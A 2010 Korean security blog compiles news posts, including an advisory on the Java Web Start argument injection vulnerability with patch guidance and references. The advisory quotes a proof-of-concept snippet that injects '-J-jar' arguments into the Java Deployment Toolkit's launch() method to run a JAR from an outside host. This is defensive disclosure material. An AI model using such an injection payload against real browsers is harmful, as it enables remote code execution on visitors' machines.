사이트) http://hakin9.org/

온라인으로 발행되는 Hakin9 매거진 입니다..
지난 달에 최초로 온라인에서 발행된 것 같은데,
"Writing WIN32 shellcode with a C-compiler", "Flash Memory Mobile Forensic"과 같은 주제들이 눈에 띄네요..+_+

이번달 이슈문서는 여기서 다운로드 가능합니다.
http://download.hakin9.org/en/hakin9_04_2010_EN.pdf

길을 걷다가 만난 A3

CR@K 이야기 2010. 5. 5. 22:09 Posted by 알 수 없는 사용자
지나가다가 A3 가 보여서 찍은 사진 :)

학습하는데는 매우 도움이 되는 DVL(Damn Vulnerable Linux) 라이브CD 사이트가 조금 변경이 되면서..

기존에 이미지(ISO파일)는 한참 올라오지 않았는데, 다시 링크가 걸려 있네요.

다운로드 속도도 웬만큼 좋게 나오고요.~

모의해킹 환경 만들기 위한 시간을 이 라이브 CD를 통해 조금 줄일 수 있을겁니다.

DVL 사이트 : http://www.damnvulnerablelinux.org/



Black Hat Europe 2010 문서 자료 다운로드 사이트입니다.

가끔씩 사이트가 연결이 안될때도 있지만, 현재는 다운로드가 잘 되고 있네요.

항상 좋은 주제들과 많은 이슈들을 다루고 있습니다.

https://www.blackhat.com/html/bh-eu-10/bh-eu-10-archives.html

참고로..

2009년도 자료들 링크입니다.

http://nchovy.kr/forum/3/article/476

문서 URL : http://www.exploit-db.com/download_pdf/12363

exploit-db 사이트에 Adobe Redear의 메모리 구조에 대해서 잘 설명된 자료가 업데이트 됐습니다.

취약점 분석 할시에 참고하기 좋을듯 하네요..


The Java Web Start Argument Injection Vulnerability 

취약점 보안 권고안

By. Dear.TOM (bdr@a3sc.co.kr)


Ⅰ. 취약점 개요

취약점

The Java Web Start Argument Injection Vulnerability

최초 발표일

2010년 4월

현재상태(패치여부)

패치됨

구성요소

Java Web Start

보안 영향

원격 코드 실행

위험도

높음



1. 요약
“The Java Web Start Argument Injection Vulnerability” 취약점은 JDT(Java Deployment Toolkit) 플러그인의 launch() 메소드 파라미터에 전달되는 입력 값의 유효성에 대한 검증이 미흡하여 발생하는 것으로, 해당 취약점은 2010년 4월 9일 Tavis Ormany에 의해 최초로 발표되었으며, Oracle Sun 社 에서는 4월 20일 공식 긴급 패치를 발표하였습니다.

2. 대상 시스템
다음은 Oracle Sun 社에서 해당 취약점에 취약한 버전을 공개한 목록입니다.

Java SE
   • JDK and JRE 6 for Windows, Solaris, and Linux      

Java for Business
   • JDK and JRE 6 for Windows, Solaris and Linux




Ⅱ. 취약점 세부 분석

1. 취약점 내용
해당 취약점은 JDT(Java Deployment Toolkit) 플러그인의 launch() 메소드의 파라미터에 전달되는 입력 값의 유효성에 대한 검증이 미흡하여 발생합니다.

JWS(Java Web Start)는 .jnlp(Java Network Launching Protocol)을 이용하여 전달받은 URL로부터 자바 어플리케이션을 다운로드 받아서 VM(Virtual Machin)에서 실행시키는 역할을 합니다. 이때, ActiveX control 과 NPAPI Plugin에서 제공하는 launch() 메소드를 통해 전달되는 URL의 유효성 검증이 미흡하여, 원격에서 악의적인 프로그램을 실행 시킬 수 있습니다.

2. 공격 분석
* 본 연구 문서는 신규 취약점 또는 보안 기술 우회 기법에 관한 문서로써 악용될 우려가 있는 상세 공격 코드 및 내용을 제한 합니다.

해당 취약점을 이용하여 제작된 악성 웹 페이지에 일반 사용자가 접근하면, 공격자가 의도한 임의의 프로그램을 실행 할 수 있습니다.

다음은 해당 취약점을 이용한 테스트 사이트의 웹 페이지 코드 입니다. 단, 해당 취약점을 최로로 밝힌 Tavis Ormany에 의해 테스트 용도로 구축되어 악의적인 공격을 수행하지는 않습니다.

<html>
        ...생략...

        // -J 옵션을 이용하여 매개변수로 전달하는 임의의 JAR 파일 실행 가능
        var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";

        if (window.navigator.appName == "Microsoft Internet Explorer") {
            var o = document.createElement("OBJECT");

            // IE 용 JDT ActiveX 플러그인 'deploytk.dll'의 클래스ID
            o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";

            // JDT 플러그인의 launch()를 실행하여, 변수 u에 저장되어 있는 실행 경로를 
            // Java Web Start(javaws.exe)의 인자로 전달
            o.launch(u);
 
         ...생략...
</html>



다음은 해당 취약점을 이용한 웹 페이지 방문 결과, 윈도우 기본 계산기 프로그램이 실행되는 것을 확인하는 화면입니다.
 

3. 위험 분석

공격자는 “The Java Web Start Argument Injection” 취약점을 이용하여 원격지에서 임의의 (악성)코드 실행이 가능합니다. 이미 해외에서는 해당 취약점을 이용한 악성코드 유포 사례가 발견되었고, 공개 취약점 공격 도구에도 해당 취약점을 공격하는 기능이 추가 되어 있어, 취약한 버전을 사용할 경우 공격 당할 위험이 크다고 볼 수 있으므로, Java 관련 프로그램 혹은 플러그인을 사용하는 사용자는 최신 버전(JRE 6 update 20 이상의 버전)으로 업데이트 하시기 바랍니다.

4. 패치 분석
2010년 4월 20일 이루어진 긴급 보안 패치(Java SE 6 update 20)에서는 코드 기반 파라미터가 없는 Java Network Launch Protocol(JNLP) File을 더이상  동작  하지않도록 수정이 되었다고 밝히고 있습니다.


Ⅲ. 해결 방안

1. Oracle Sun 社 에서 제공하는 공식 패치 적용 - Java 6 Updatae 20
  URL) http://www.oracle.com/technology/deploy/security/alerts/alert-cve-2010-0886.html


Ⅳ. 참고자료

[1] [Full-disclosure] Java Deployment Toolkit Performs Insufficient Validation of Parameters
  URL) http://lists.grok.org.uk/pipermail/full-disclosure/2010-April/074036.html
[2] Java Deployment Toolkit Test Page
  URL) http://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html
[3] Java SE 6 Update 20 Release Notes
  URL) http://java.sun.com/javase/6/webnotes/6u20.html
[4] Security Alert for CVE-2010-0886 and CVE-2010-0887 Released
  URL) http://blogs.oracle.com/security/2010/04/security_alert_for_cve-2010-08.html
[5] JAVA Web Start Arbitrary command-line injection - "-XXaltjvm" arbitrary dll loading
  URL) http://reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1
[6] Java exploit launches local Windows applications
  URL) http://www.h-online.com/security/news/item/Java-exploit-launches-local-Windows-applications-974652.html
[7] Java zero-day flaw under active attack
  URL) http://blogs.zdnet.com/security/?p=6161
[8] The Java Web Start Argument Injection Vulnerability
  URL) http://blog.metasploit.com/2010/04/java-web-start-argument-injection.html

 

※ 현재 ㈜에이쓰리시큐리티에서 테스트 및 분석 중에 있으며, 이 문서는 계속 업데이트될 것입니다. 본 문서는 보안취약점으로 인한 피해를 최소화하는 데 도움이 되고자 작성되었으나, 본 문서에 포함된 대응방안의 유효성이나 기타 예상치 못한 시스템의 오작동 발생에 대하여서는 ㈜에이쓰리시큐리티에서는 일체의 책임을 지지 아니합니다.


아이폰에서 Android OS를 구동한다(?)

스마트폰 2010. 4. 22. 22:27 Posted by TEAMCR@K
http://linuxoniphone.blogspot.com/2010/04/ive-been-working-on-this-quietly-in.html

아이폰 2G환경에서 테스트를 한거 같네요. 아이폰에서 Android 1.6 으로 멀티부팅을 가능하게 만들어 시범을 보이는 깜딱 영상입니다.

댓글이 엄청나네요...

OWASP 2010 정식 버전 릴리즈

보안 소식/주간 이슈 2010. 4. 20. 09:35 Posted by 알 수 없는 사용자


정식 버전이 어제 4월 19일 부로 릴리즈 되었습니다.

[홈페이지]
http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

아래는 홈페이지에 나와 있는 pdf 다운로드 링크입니다.
[다운로드 링크1 : google docs]
https://docs.google.com/uc?export=download&id=0B3B7xlV22G8TNGUyOTFjMjAtZDJjMi00MjM4LTlmNGUtMzFiODdjMTA2OTZm
[다운로드 링크2 : googlecode]
http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202010.pdf


국내 사용자들이 많이 사용하고 있는 Adobe PDF Reader 와 Foxit PDF Reader에서 "/Launch /Action" 을 이용한 사회 공학적 공격 기법이 이루어지고 있습니다.

메시지 구문을 수정하여 정상적인 메시지처럼 위장할 수 있으며, 사용자들에게 버튼 입력을 유도하여, 특정 명령어를 실행하게끔 합니다.

[대응방안]
Adobe Reader 인 경우에는 [환경 설정] > [신뢰 관리자] > [PDF가 아닌 첨부 파일을 외부 응용 프로그램으로 열기 허용] 에 기본적으로 설정되어 있는 부분을 체크 해제 하시고 사용하기 바랍니다.


(사진 참조 : http://hummingbird.tistory.com/2026)


foxit Reader는 현재 패치가 완료되었다고 합니다.
참고 사이트 : http://www.foxitsoftware.com/announcements/2010420408.html

[참고 사이트]
http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/
http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/
http://hummingbird.tistory.com/2026

3월 22일자로 블로그에 업로드된 '스마트폰 악성코드 위협 고찰'에 대한 질의가 쇄도하여 주요 질의에 대한 답변을 아래와 같이 정리하였습니다.

1. 금번 연구와 jailbreak(일명 탈옥)와의 관계
- 금번 연구는 jailbreak가 안된 일명 '순정폰'에서 테스트하였음
- 테스트는 아이폰과 동일 펌웨어(version 3.1.3)인 아이팟에서 테스트하였음

2. 금번 연구와 멀티태스킹과의 관계
- 금번 연구는 "해당 OS의 멀티태스킹 불가 기능"에 대해 우회 또는 무력화 하는 기법을 구현한 것임

3. 주요 사용 기술
- 아이폰 SDK를 사용하지 않고 별도의 프로세스를 forking하는 방식으로 구현

4. 악성프로그램 업로드
- 악성프로그램 배포 연구는 아니었으나, 실제 테스트는 개발PC에서 단말기에 전송
- 악성프로그램은 정상APP을 가장한 악성APP 형식으로 구현

5. 시사점 및 대책
- 정상APP을 가장한 악성APP이 종료(사용자 종료 행위 개입)되어도 백그라운드로 악성프로세스가 계속 구동될 수 있
는 부분이 시사점임
- 사용자 인식제고 뿐 아니라 악성APP 및 멀티태스킹을 우회하는 프로세스에 대한 탐지/차단 기술 등이 전반적으로
고려되어야 함